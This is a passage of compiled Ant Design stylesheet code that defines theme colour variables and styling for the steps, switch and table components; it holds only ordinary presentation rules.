#096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-steps { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; display: flex; width: 100%; font-size: 0; text-align: initial; } .ant-steps-item { position: relative; display: inline-block; flex: 1; overflow: hidden; vertical-align: top; } .ant-steps-item-container { outline: none; } .ant-steps-item:last-child { flex: none; } .ant-steps-item:last-child > .ant-steps-item-container > .ant-steps-item-tail, .ant-steps-item:last-child > .ant-steps-item-container > .ant-steps-item-content > .ant-steps-item-title::after { display: none; } .ant-steps-item-icon, .ant-steps-item-content { display: inline-block; vertical-align: top; } .ant-steps-item-icon { width: 32px; height: 32px; margin: 0 8px 0 0; font-size: 16px; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, 'Noto Sans', sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol', 'Noto Color Emoji'; line-height: 32px; text-align: center; border: 1px solid rgba(0, 0, 0, 0.25); border-radius: 32px; transition: background-color 0.3s, border-color 0.3s; } .ant-steps-item-icon .ant-steps-icon { position: relative; top: -0.5px; color: var(--ant-primary-color); line-height: 1; } .ant-steps-item-tail { position: absolute; top: 12px; left: 0; width: 100%; padding: 0 10px; } .ant-steps-item-tail::after { display: inline-block; width: 100%; height: 1px; background: #f0f0f0; border-radius: 1px; transition: background 0.3s; content: ''; } .ant-steps-item-title { position: relative; display: inline-block; padding-right: 16px; color: rgba(0, 0, 0, 0.85); font-size: 16px; line-height: 32px; } .ant-steps-item-title::after { position: absolute; top: 16px; left: 100%; display: block; width: 9999px; height: 1px; background: #f0f0f0; content: ''; } .ant-steps-item-subtitle { display: inline; margin-left: 8px; color: rgba(0, 0, 0, 0.45); font-weight: normal; font-size: 14px; } .ant-steps-item-description { color: rgba(0, 0, 0, 0.45); font-size: 14px; } .ant-steps-item-wait .ant-steps-item-icon { background-color: #fff; border-color: rgba(0, 0, 0, 0.25); } .ant-steps-item-wait .ant-steps-item-icon > .ant-steps-icon { color: rgba(0, 0, 0, 0.25); } .ant-steps-item-wait .ant-steps-item-icon > .ant-steps-icon .ant-steps-icon-dot { background: rgba(0, 0, 0, 0.25); } .ant-steps-item-wait > .ant-steps-item-container > .ant-steps-item-content > .ant-steps-item-title { color: rgba(0, 0, 0, 0.45); } .ant-steps-item-wait > .ant-steps-item-container > .ant-steps-item-content > .ant-steps-item-title::after { background-color: #f0f0f0; } .ant-steps-item-wait > .ant-steps-item-container > .ant-steps-item-content > .ant-steps-item-description { color: rgba(0, 0, 0, 0.45); } .ant-steps-item-wait > .ant-steps-item-container > .ant-steps-item-tail::after { background-color: #f0f0f0; } .ant-steps-item-process .ant-steps-item-icon { background-color: #fff; border-color: var(--ant-primary-color); } .ant-steps-item-process .ant-steps-item-icon > .ant-steps-icon { color: var(--ant-primary-color); } .ant-steps-item-process .ant-steps-item-icon > .ant-steps-icon .ant-steps-icon-dot { background: var(--ant-primary-color); } .ant-steps-item-process > .ant-steps-item-container > .ant-steps-item-content > .ant-steps-item-title { color: rgba(0, 0, 0, 0.85); } .ant-steps-item-process > .ant-steps-item-container > .ant-steps-item-content > .ant-steps-item-title::after { background-color: #f0f0f0; } .ant-steps-item-process > .ant-steps-item-container > .ant-steps-item-content > .ant-steps-item-description { color: rgba(0, 0, 0, 0.85); } .ant-steps-item-process > .ant-steps-item-container > .ant-steps-item-tail::after { background-color: #f0f0f0; } .ant-steps-item-process > .ant-steps-item-container > .ant-steps-item-icon { background: var(--ant-primary-color); } .ant-steps-item-process > .ant-steps-item-container > .ant-steps-item-icon .ant-steps-icon { color: #fff; } .ant-steps-item-process > .ant-steps-item-container > .ant-steps-item-title { font-weight: 500; } .ant-steps-item-finish .ant-steps-item-icon { background-color: #fff; border-color: var(--ant-primary-color); } .ant-steps-item-finish .ant-steps-item-icon > .ant-steps-icon { color: var(--ant-primary-color); } .ant-steps-item-finish .ant-steps-item-icon > .ant-steps-icon .ant-steps-icon-dot { background: var(--ant-primary-color); } .ant-steps-item-finish > .ant-steps-item-container > .ant-steps-item-content > .ant-steps-item-title { color: rgba(0, 0, 0, 0.85); } .ant-steps-item-finish > .ant-steps-item-container > .ant-steps-item-content > .ant-steps-item-title::after { background-color: var(--ant-primary-color); } .ant-steps-item-finish > .ant-steps-item-container > .ant-steps-item-content > .ant-steps-item-description { color: rgba(0, 0, 0, 0.45); } .ant-steps-item-finish > .ant-steps-item-container > .ant-steps-item-tail::after { background-color: var(--ant-primary-color); } .ant-steps-item-error .ant-steps-item-icon { background-color: #fff; border-color: var(--ant-error-color); } .ant-steps-item-error .ant-steps-item-icon > .ant-steps-icon { color: var(--ant-error-color); } .ant-steps-item-error .ant-steps-item-icon > .ant-steps-icon .ant-steps-icon-dot { background: var(--ant-error-color); } .ant-steps-item-error > .ant-steps-item-container > .ant-steps-item-content > .ant-steps-item-title { color: var(--ant-error-color); } .ant-steps-item-error > .ant-steps-item-container > .ant-steps-item-content > .ant-steps-item-title::after { background-color: #f0f0f0; } .ant-steps-item-error > .ant-steps-item-container > .ant-steps-item-content > .ant-steps-item-description { color: var(--ant-error-color); } .ant-steps-item-error > .ant-steps-item-container > .ant-steps-item-tail::after { background-color: #f0f0f0; } .ant-steps-item.ant-steps-next-error .ant-steps-item-title::after { background: var(--ant-error-color); } .ant-steps-item-disabled { cursor: not-allowed; } .ant-steps .ant-steps-item:not(.ant-steps-item-active) > .ant-steps-item-container[role='button'] { cursor: pointer; } .ant-steps .ant-steps-item:not(.ant-steps-item-active) > .ant-steps-item-container[role='button'] .ant-steps-item-title, .ant-steps .ant-steps-item:not(.ant-steps-item-active) > .ant-steps-item-container[role='button'] .ant-steps-item-subtitle, .ant-steps .ant-steps-item:not(.ant-steps-item-active) > .ant-steps-item-container[role='button'] .ant-steps-item-description, .ant-steps .ant-steps-item:not(.ant-steps-item-active) > .ant-steps-item-container[role='button'] .ant-steps-item-icon .ant-steps-icon { transition: color 0.3s; } .ant-steps .ant-steps-item:not(.ant-steps-item-active) > .ant-steps-item-container[role='button']:hover .ant-steps-item-title, .ant-steps .ant-steps-item:not(.ant-steps-item-active) > .ant-steps-item-container[role='button']:hover .ant-steps-item-subtitle, .ant-steps .ant-steps-item:not(.ant-steps-item-active) > .ant-steps-item-container[role='button']:hover .ant-steps-item-description { color: var(--ant-primary-color); } .ant-steps .ant-steps-item:not(.ant-steps-item-active):not(.ant-steps-item-process) > .ant-steps-item-container[role='button']:hover .ant-steps-item-icon { border-color: var(--ant-primary-color); } .ant-steps .ant-steps-item:not(.ant-steps-item-active):not(.ant-steps-item-process) > .ant-steps-item-container[role='button']:hover .ant-steps-item-icon .ant-steps-icon { color: var(--ant-primary-color); } .ant-steps-horizontal:not(.ant-steps-label-vertical) .ant-steps-item { padding-left: 16px; white-space: nowrap; } .ant-steps-horizontal:not(.ant-steps-label-vertical) .ant-steps-item:first-child { padding-left: 0; } .ant-steps-horizontal:not(.ant-steps-label-vertical) .ant-steps-item:last-child .ant-steps-item-title { padding-right: 0; } .ant-steps-horizontal:not(.ant-steps-label-vertical) .ant-steps-item-tail { display: none; } .ant-steps-horizontal:not(.ant-steps-label-vertical) .ant-steps-item-description { max-width: 140px; white-space: normal; } .ant-steps-item-custom > .ant-steps-item-container > .ant-steps-item-icon { height: auto; background: none; border: 0; } .ant-steps-item-custom > .ant-steps-item-container > .ant-steps-item-icon > .ant-steps-icon { top: 0px; left: 0.5px; width: 32px; height: 32px; font-size: 24px; line-height: 32px; } .ant-steps-item-custom.ant-steps-item-process .ant-steps-item-icon > .ant-steps-icon { color: var(--ant-primary-color); } .ant-steps:not(.ant-steps-vertical) .ant-steps-item-custom .ant-steps-item-icon { width: auto; background: none; } .ant-steps-small.ant-steps-horizontal:not(.ant-steps-label-vertical) .ant-steps-item { padding-left: 12px; } .ant-steps-small.ant-steps-horizontal:not(.ant-steps-label-vertical) .ant-steps-item:first-child { padding-left: 0; } .ant-steps-small .ant-steps-item-icon { width: 24px; height: 24px; margin: 0 8px 0 0; font-size: 12px; line-height: 24px; text-align: center; border-radius: 24px; } .ant-steps-small .ant-steps-item-title { padding-right: 12px; font-size: 14px; line-height: 24px; } .ant-steps-small .ant-steps-item-title::after { top: 12px; } .ant-steps-small .ant-steps-item-description { color: rgba(0, 0, 0, 0.45); font-size: 14px; } .ant-steps-small .ant-steps-item-tail { top: 8px; } .ant-steps-small .ant-steps-item-custom .ant-steps-item-icon { width: inherit; height: inherit; line-height: inherit; background: none; border: 0; border-radius: 0; } .ant-steps-small .ant-steps-item-custom .ant-steps-item-icon > .ant-steps-icon { font-size: 24px; line-height: 24px; transform: none; } .ant-steps-vertical { display: flex; flex-direction: column; } .ant-steps-vertical > .ant-steps-item { display: block; flex: 1 0 auto; padding-left: 0; overflow: visible; } .ant-steps-vertical > .ant-steps-item .ant-steps-item-icon { float: left; margin-right: 16px; } .ant-steps-vertical > .ant-steps-item .ant-steps-item-content { display: block; min-height: 48px; overflow: hidden; } .ant-steps-vertical > .ant-steps-item .ant-steps-item-title { line-height: 32px; } .ant-steps-vertical > .ant-steps-item .ant-steps-item-description { padding-bottom: 12px; } .ant-steps-vertical > .ant-steps-item > .ant-steps-item-container > .ant-steps-item-tail { position: absolute; top: 0; left: 16px; width: 1px; height: 100%; padding: 38px 0 6px; } .ant-steps-vertical > .ant-steps-item > .ant-steps-item-container > .ant-steps-item-tail::after { width: 1px; height: 100%; } .ant-steps-vertical > .ant-steps-item:not(:last-child) > .ant-steps-item-container > .ant-steps-item-tail { display: block; } .ant-steps-vertical > .ant-steps-item > .ant-steps-item-container > .ant-steps-item-content > .ant-steps-item-title::after { display: none; } .ant-steps-vertical.ant-steps-small .ant-steps-item-container .ant-steps-item-tail { position: absolute; top: 0; left: 12px; padding: 30px 0 6px; } .ant-steps-vertical.ant-steps-small .ant-steps-item-container .ant-steps-item-title { line-height: 24px; } .ant-steps-label-vertical .ant-steps-item { overflow: visible; } .ant-steps-label-vertical .ant-steps-item-tail { margin-left: 58px; padding: 3.5px 24px; } .ant-steps-label-vertical .ant-steps-item-content { display: block; width: 116px; margin-top: 8px; text-align: center; } .ant-steps-label-vertical .ant-steps-item-icon { display: inline-block; margin-left: 42px; } .ant-steps-label-vertical .ant-steps-item-title { padding-right: 0; padding-left: 0; } .ant-steps-label-vertical .ant-steps-item-title::after { display: none; } .ant-steps-label-vertical .ant-steps-item-subtitle { display: block; margin-bottom: 4px; margin-left: 0; line-height: 1.5715; } .ant-steps-label-vertical.ant-steps-small:not(.ant-steps-dot) .ant-steps-item-icon { margin-left: 46px; } .ant-steps-dot .ant-steps-item-title, .ant-steps-dot.ant-steps-small .ant-steps-item-title { line-height: 1.5715; } .ant-steps-dot .ant-steps-item-tail, .ant-steps-dot.ant-steps-small .ant-steps-item-tail { top: 2px; width: 100%; margin: 0 0 0 70px; padding: 0; } .ant-steps-dot .ant-steps-item-tail::after, .ant-steps-dot.ant-steps-small .ant-steps-item-tail::after { width: calc(100% - 20px); height: 3px; margin-left: 12px; } .ant-steps-dot .ant-steps-item:first-child .ant-steps-icon-dot, .ant-steps-dot.ant-steps-small .ant-steps-item:first-child .ant-steps-icon-dot { left: 2px; } .ant-steps-dot .ant-steps-item-icon, .ant-steps-dot.ant-steps-small .ant-steps-item-icon { width: 8px; height: 8px; margin-left: 67px; padding-right: 0; line-height: 8px; background: transparent; border: 0; } .ant-steps-dot .ant-steps-item-icon .ant-steps-icon-dot, .ant-steps-dot.ant-steps-small .ant-steps-item-icon .ant-steps-icon-dot { position: relative; float: left; width: 100%; height: 100%; border-radius: 100px; transition: all 0.3s; /* expand hover area */ } .ant-steps-dot .ant-steps-item-icon .ant-steps-icon-dot::after, .ant-steps-dot.ant-steps-small .ant-steps-item-icon .ant-steps-icon-dot::after { position: absolute; top: -12px; left: -26px; width: 60px; height: 32px; background: rgba(0, 0, 0, 0.001); content: ''; } .ant-steps-dot .ant-steps-item-content, .ant-steps-dot.ant-steps-small .ant-steps-item-content { width: 140px; } .ant-steps-dot .ant-steps-item-process .ant-steps-item-icon, .ant-steps-dot.ant-steps-small .ant-steps-item-process .ant-steps-item-icon { position: relative; top: -1px; width: 10px; height: 10px; line-height: 10px; background: none; } .ant-steps-dot .ant-steps-item-process .ant-steps-icon:first-child .ant-steps-icon-dot, .ant-steps-dot.ant-steps-small .ant-steps-item-process .ant-steps-icon:first-child .ant-steps-icon-dot { left: 0; } .ant-steps-vertical.ant-steps-dot .ant-steps-item-icon { margin-top: 13px; margin-left: 0; background: none; } .ant-steps-vertical.ant-steps-dot .ant-steps-item > .ant-steps-item-container > .ant-steps-item-tail { top: 6.5px; left: -9px; margin: 0; padding: 22px 0 4px; } .ant-steps-vertical.ant-steps-dot .ant-steps-item:first-child .ant-steps-icon-dot { left: 0; } .ant-steps-vertical.ant-steps-dot .ant-steps-item-content { width: inherit; } .ant-steps-vertical.ant-steps-dot .ant-steps-item-process .ant-steps-item-container .ant-steps-item-icon .ant-steps-icon-dot { top: -1px; left: -1px; } .ant-steps-navigation { padding-top: 12px; } .ant-steps-navigation.ant-steps-small .ant-steps-item-container { margin-left: -12px; } .ant-steps-navigation .ant-steps-item { overflow: visible; text-align: center; } .ant-steps-navigation .ant-steps-item-container { display: inline-block; height: 100%; margin-left: -16px; padding-bottom: 12px; text-align: left; transition: opacity 0.3s; } .ant-steps-navigation .ant-steps-item-container .ant-steps-item-content { max-width: auto; } .ant-steps-navigation .ant-steps-item-container .ant-steps-item-title { max-width: 100%; padding-right: 0; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } .ant-steps-navigation .ant-steps-item-container .ant-steps-item-title::after { display: none; } .ant-steps-navigation .ant-steps-item:not(.ant-steps-item-active) .ant-steps-item-container[role='button'] { cursor: pointer; } .ant-steps-navigation .ant-steps-item:not(.ant-steps-item-active) .ant-steps-item-container[role='button']:hover { opacity: 0.85; } .ant-steps-navigation .ant-steps-item:last-child { flex: 1; } .ant-steps-navigation .ant-steps-item:last-child::after { display: none; } .ant-steps-navigation .ant-steps-item::after { position: absolute; top: 50%; left: 100%; display: inline-block; width: 12px; height: 12px; margin-top: -14px; margin-left: -2px; border: 1px solid rgba(0, 0, 0, 0.25); border-bottom: none; border-left: none; transform: rotate(45deg); content: ''; } .ant-steps-navigation .ant-steps-item::before { position: absolute; bottom: 0; left: 50%; display: inline-block; width: 0; height: 2px; background-color: var(--ant-primary-color); transition: width 0.3s, left 0.3s; transition-timing-function: ease-out; content: ''; } .ant-steps-navigation .ant-steps-item.ant-steps-item-active::before { left: 0; width: 100%; } .ant-steps-navigation.ant-steps-vertical > .ant-steps-item { margin-right: 0 !important; } .ant-steps-navigation.ant-steps-vertical > .ant-steps-item::before { display: none; } .ant-steps-navigation.ant-steps-vertical > .ant-steps-item.ant-steps-item-active::before { top: 0; right: 0; left: unset; display: block; width: 3px; height: calc(100% - 24px); } .ant-steps-navigation.ant-steps-vertical > .ant-steps-item::after { position: relative; top: -2px; left: 50%; display: block; width: 8px; height: 8px; margin-bottom: 8px; text-align: center; transform: rotate(135deg); } .ant-steps-navigation.ant-steps-vertical > .ant-steps-item > .ant-steps-item-container > .ant-steps-item-tail { visibility: hidden; } .ant-steps-rtl { direction: rtl; } .ant-steps.ant-steps-rtl .ant-steps-item-icon { margin-right: 0; margin-left: 8px; } .ant-steps-rtl .ant-steps-item-tail { right: 0; left: auto; } .ant-steps-rtl .ant-steps-item-title { padding-right: 0; padding-left: 16px; } .ant-steps-rtl .ant-steps-item-title::after { right: 100%; left: auto; } .ant-steps-rtl.ant-steps-horizontal:not(.ant-steps-label-vertical) .ant-steps-item { padding-right: 16px; padding-left: 0; } .ant-steps-rtl.ant-steps-horizontal:not(.ant-steps-label-vertical) .ant-steps-item:first-child { padding-right: 0; } .ant-steps-rtl.ant-steps-horizontal:not(.ant-steps-label-vertical) .ant-steps-item:last-child .ant-steps-item-title { padding-left: 0; } .ant-steps-rtl .ant-steps-item-custom .ant-steps-item-icon > .ant-steps-icon { right: 0.5px; left: auto; } .ant-steps-rtl.ant-steps-navigation.ant-steps-small .ant-steps-item-container { margin-right: -12px; margin-left: 0; } .ant-steps-rtl.ant-steps-navigation .ant-steps-item-container { margin-right: -16px; margin-left: 0; text-align: right; } .ant-steps-rtl.ant-steps-navigation .ant-steps-item-container .ant-steps-item-title { padding-left: 0; } .ant-steps-rtl.ant-steps-navigation .ant-steps-item::after { right: 100%; left: auto; margin-right: -2px; margin-left: 0; transform: rotate(225deg); } .ant-steps-rtl.ant-steps-small.ant-steps-horizontal:not(.ant-steps-label-vertical) .ant-steps-item { padding-right: 12px; padding-left: 0; } .ant-steps-rtl.ant-steps-small.ant-steps-horizontal:not(.ant-steps-label-vertical) .ant-steps-item:first-child { padding-right: 0; } .ant-steps-rtl.ant-steps-small .ant-steps-item-title { padding-right: 0; padding-left: 12px; } .ant-steps-rtl.ant-steps-vertical > .ant-steps-item .ant-steps-item-icon { float: right; margin-right: 0; margin-left: 16px; } .ant-steps-rtl.ant-steps-vertical > .ant-steps-item > .ant-steps-item-container > .ant-steps-item-tail { right: 16px; left: auto; } .ant-steps-rtl.ant-steps-vertical.ant-steps-small .ant-steps-item-container .ant-steps-item-tail { right: 12px; left: auto; } .ant-steps-rtl.ant-steps-label-vertical .ant-steps-item-title { padding-left: 0; } .ant-steps-rtl.ant-steps-dot .ant-steps-item-tail, .ant-steps-rtl.ant-steps-dot.ant-steps-small .ant-steps-item-tail { margin: 0 70px 0 0; } .ant-steps-rtl.ant-steps-dot .ant-steps-item-tail::after, .ant-steps-rtl.ant-steps-dot.ant-steps-small .ant-steps-item-tail::after { margin-right: 12px; margin-left: 0; } .ant-steps-rtl.ant-steps-dot .ant-steps-item:first-child .ant-steps-icon-dot, .ant-steps-rtl.ant-steps-dot.ant-steps-small .ant-steps-item:first-child .ant-steps-icon-dot { right: 2px; left: auto; } .ant-steps-rtl.ant-steps-dot .ant-steps-item-icon, .ant-steps-rtl.ant-steps-dot.ant-steps-small .ant-steps-item-icon { margin-right: 67px; margin-left: 0; } .ant-steps-dot .ant-steps-item-icon .ant-steps-icon-dot, .ant-steps-dot.ant-steps-small .ant-steps-item-icon .ant-steps-icon-dot { /* expand hover area */ } .ant-steps-rtl.ant-steps-dot .ant-steps-item-icon .ant-steps-icon-dot, .ant-steps-rtl.ant-steps-dot.ant-steps-small .ant-steps-item-icon .ant-steps-icon-dot { float: right; } .ant-steps-rtl.ant-steps-dot .ant-steps-item-icon .ant-steps-icon-dot::after, .ant-steps-rtl.ant-steps-dot.ant-steps-small .ant-steps-item-icon .ant-steps-icon-dot::after { right: -26px; left: auto; } .ant-steps-rtl.ant-steps-vertical.ant-steps-dot .ant-steps-item-icon { margin-right: 0; margin-left: 16px; } .ant-steps-rtl.ant-steps-vertical.ant-steps-dot .ant-steps-item > .ant-steps-item-container > .ant-steps-item-tail { right: -9px; left: auto; } .ant-steps-rtl.ant-steps-vertical.ant-steps-dot .ant-steps-item:first-child .ant-steps-icon-dot { right: 0; left: auto; } .ant-steps-rtl.ant-steps-vertical.ant-steps-dot .ant-steps-item-process .ant-steps-icon-dot { right: -2px; left: auto; } .ant-steps-rtl.ant-steps-with-progress.ant-steps-horizontal.ant-steps-label-horizontal .ant-steps-item:first-child.ant-steps-item-active { padding-right: 4px; } .ant-steps-with-progress .ant-steps-item { padding-top: 4px; } .ant-steps-with-progress .ant-steps-item .ant-steps-item-tail { top: 4px !important; } .ant-steps-with-progress.ant-steps-horizontal .ant-steps-item:first-child { padding-bottom: 4px; padding-left: 4px; } .ant-steps-with-progress .ant-steps-item-icon { position: relative; } .ant-steps-with-progress .ant-steps-item-icon .ant-progress { position: absolute; top: -5px; right: -5px; bottom: -5px; left: -5px; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-switch { margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; display: inline-block; box-sizing: border-box; min-width: 44px; height: 22px; line-height: 22px; vertical-align: middle; background-color: rgba(0, 0, 0, 0.25); border: 0; border-radius: 100px; cursor: pointer; transition: all 0.2s; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-switch:focus { outline: 0; box-shadow: 0 0 0 2px rgba(0, 0, 0, 0.1); } .ant-switch-checked:focus { box-shadow: 0 0 0 2px var(--ant-primary-1); } .ant-switch:focus:hover { box-shadow: none; } .ant-switch-checked { background-color: var(--ant-primary-color); } .ant-switch-loading, .ant-switch-disabled { cursor: not-allowed; opacity: 0.4; } .ant-switch-loading *, .ant-switch-disabled * { box-shadow: none; cursor: not-allowed; } .ant-switch-inner { display: block; margin: 0 7px 0 25px; color: #fff; font-size: 12px; transition: margin 0.2s; } .ant-switch-checked .ant-switch-inner { margin: 0 25px 0 7px; } .ant-switch-handle { position: absolute; top: 2px; left: 2px; width: 18px; height: 18px; transition: all 0.2s ease-in-out; } .ant-switch-handle::before { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background-color: #fff; border-radius: 9px; box-shadow: 0 2px 4px 0 rgba(0, 35, 11, 0.2); transition: all 0.2s ease-in-out; content: ''; } .ant-switch-checked .ant-switch-handle { left: calc(100% - 18px - 2px); } .ant-switch:not(.ant-switch-disabled):active .ant-switch-handle::before { right: -30%; left: 0; } .ant-switch:not(.ant-switch-disabled):active.ant-switch-checked .ant-switch-handle::before { right: 0; left: -30%; } .ant-switch-loading-icon.anticon { position: relative; top: 2px; color: rgba(0, 0, 0, 0.65); vertical-align: top; } .ant-switch-checked .ant-switch-loading-icon { color: var(--ant-primary-color); } .ant-switch-small { min-width: 28px; height: 16px; line-height: 16px; } .ant-switch-small .ant-switch-inner { margin: 0 5px 0 18px; font-size: 12px; } .ant-switch-small .ant-switch-handle { width: 12px; height: 12px; } .ant-switch-small .ant-switch-loading-icon { top: 1.5px; font-size: 9px; } .ant-switch-small.ant-switch-checked .ant-switch-inner { margin: 0 18px 0 5px; } .ant-switch-small.ant-switch-checked .ant-switch-handle { left: calc(100% - 12px - 2px); } .ant-switch-rtl { direction: rtl; } .ant-switch-rtl .ant-switch-inner { margin: 0 25px 0 7px; } .ant-switch-rtl .ant-switch-handle { right: 2px; left: auto; } .ant-switch-rtl:not(.ant-switch-rtl-disabled):active .ant-switch-handle::before { right: 0; left: -30%; } .ant-switch-rtl:not(.ant-switch-rtl-disabled):active.ant-switch-checked .ant-switch-handle::before { right: -30%; left: 0; } .ant-switch-rtl.ant-switch-checked .ant-switch-inner { margin: 0 7px 0 25px; } .ant-switch-rtl.ant-switch-checked .ant-switch-handle { right: calc(100% - 18px - 2px); } .ant-switch-rtl.ant-switch-small.ant-switch-checked .ant-switch-handle { right: calc(100% - 12px - 2px); } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-table.ant-table-middle { font-size: 14px; } .ant-table.ant-table-middle .ant-table-title, .ant-table.ant-table-middle .ant-table-footer, .ant-table.ant-table-middle .ant-table-thead > tr > th, .ant-table.ant-table-middle .ant-table-tbody > tr > td, .ant-table.ant-table-middle tfoot > tr > th, .ant-table.ant-table-middle tfoot > tr > td { padding: 12px 8px; } .ant-table.ant-table-middle .ant-table-filter-trigger { margin-right: -4px; } .ant-table.ant-table-middle .ant-table-expanded-row-fixed { margin: -12px -8px; } .ant-table.ant-table-middle .ant-table-tbody .ant-table-wrapper:only-child .ant-table { margin: -12px -8px -12px 25px; } .ant-table.ant-table-small { font-size: 14px; } .ant-table.ant-table-small .ant-table-title, .ant-table.ant-table-small .ant-table-footer, .ant-table.ant-table-small .ant-table-thead > tr > th, .ant-table.ant-table-small .ant-table-tbody > tr > td, .ant-table.ant-table-small tfoot > tr > th, .ant-table.ant-table-small tfoot > tr > td { padding: 8px 8px; } .ant-table.ant-table-small .ant-table-filter-trigger { margin-right: -4px; } .ant-table.ant-table-small .ant-table-expanded-row-fixed { margin: -8px -8px; } .ant-table.ant-table-small .ant-table-tbody .ant-table-wrapper:only-child .ant-table { margin: -8px -8px -8px 25px; } .ant-table-small .ant-table-thead > tr > th { background-color: #fafafa; } .ant-table-small .ant-table-selection-column { width: 46px; min-width: 46px; } .ant-table.ant-table-bordered > .ant-table-title { border: 1px solid #f0f0f0; border-bottom: 0; } .ant-table.ant-table-bordered > .ant-table-container { border-left: 1px solid #f0f0f0; } 